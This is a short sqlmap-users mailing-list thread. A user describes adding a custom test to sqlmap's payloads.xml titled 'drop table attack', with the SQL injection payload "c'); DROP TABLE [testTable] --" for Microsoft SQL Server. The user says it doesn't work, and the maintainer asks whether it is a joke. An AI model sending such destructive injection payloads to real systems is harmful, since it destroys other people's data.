So you made a "DROP TABLE" payload :))
I am not sure if this is a joke or for real?!
Kind regards,
Miroslav Stampar
On Tue, Jan 21, 2014 at 10:24 AM, l.g. <ibozoo...@googlemail.com> wrote:
> <l.g> writes:
>
> >
> > hi! In payloads.xml I substituted this snippet:
> >
> > - <!-- End of AGAINST boolean full-text search boundaries
> > -->
> > - <!-- Boolean-based blind tests - WHERE/HAVING clause
> > -->
> > - <test>
> > - <test>
> > <title>drop table attack</title>
> > <stype>2</stype>
> > <level>1</level>
> > <risk>5</risk>
> > <clause>1</clause>
> > <where>1</where>
> > <vector>c'); DROP TABLE [testTable] --</vector>
> > - <request>
> > <payload>c'); DROP TABLE [testTable] --</payload>
> > <comment>--</comment>
> > </request>
> > - <response>
> > <grep>object</grep>
> > </response>
> > - <details>
> > <dbms>Microsoft SQL Server</dbms>
> > </details>
> > </test>
> > - <test>
> > <title>AND boolean-based blind - WHERE or HAVING clause</title>
> > <stype>1</stype>
> > <level>1</level>
> > <risk>1</risk>
> > <clause>1</clause>
> > <where>1</where>
> > <vector>AND [INFERENCE]</vector>
> > - <request>
> > <payload>AND [RANDNUM]=[RANDNUM]</payload>
> > </request>
> > - <response>
> > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
> > </response>
> > </test>
> >
> > with this:
> >
> > - <!-- End of AGAINST boolean full-text search boundaries
> > -->
> > - <!-- Boolean-based blind tests - WHERE/HAVING clause
> > -->
> > - <test>
> > - <test>
> > <title>AND boolean-based blind - WHERE or HAVING clause</title>
> > <stype>1</stype>
> > <level>1</level>
> > <risk>1</risk>
> > <clause>1</clause>
> > <where>1</where>
> > <vector>AND [INFERENCE]</vector>
> > - <request>
> > <payload>AND [RANDNUM]=[RANDNUM]</payload>
> > </request>
> > - <response>
> > <comparison>AND [RANDNUM]=[RANDNUM1]</comparison>
> > </response>
> > </test>
> >
> > but it doesn't work..
> > thank you
> >
> >
> --------------------------------------------------------------------------
> ----
> > CenturyLink Cloud: The Leader in Enterprise Cloud Services.
> > Learn Why More Businesses Are Choosing CenturyLink Cloud For
> > Critical Workloads, Development Environments & Everything In Between.
> > Get a Quote or Start a Free Trial Today.
> > http://pubads.g.doubleclick.net/gampad/clk?
> id=119420431&iu=/4140/ostg.clktrk
> >
> Sorry! I inverted the snippets in the previous post..
>
> this is what I added to std xml:
>
> - <test>
> <title>drop table attack</title>
> <stype>2</stype>
> <level>1</level>
> <risk>5</risk>
> <clause>1</clause>
> <where>1</where>
> <vector>c'); DROP TABLE [testTable] --</vector>
> - <request>
> <payload>c'); DROP TABLE [testTable] --</payload>
> <comment>--</comment>
> </request>
> - <response>
> <grep>object</grep>
> </response>
> - <details>
> <dbms>Microsoft SQL Server</dbms>
> </details>
> </test>
>
>
>
>
>
> ------------------------------------------------------------------------------
> CenturyLink Cloud: The Leader in Enterprise Cloud Services.
> Learn Why More Businesses Are Choosing CenturyLink Cloud For
> Critical Workloads, Development Environments & Everything In Between.
> Get a Quote or Start a Free Trial Today.
>
> http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
CenturyLink Cloud: The Leader in Enterprise Cloud Services.
Learn Why More Businesses Are Choosing CenturyLink Cloud For
Critical Workloads, Development Environments & Everything In Between.
Get a Quote or Start a Free Trial Today.
http://pubads.g.doubleclick.net/gampad/clk?id=119420431&iu=/4140/ostg.clktrk
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
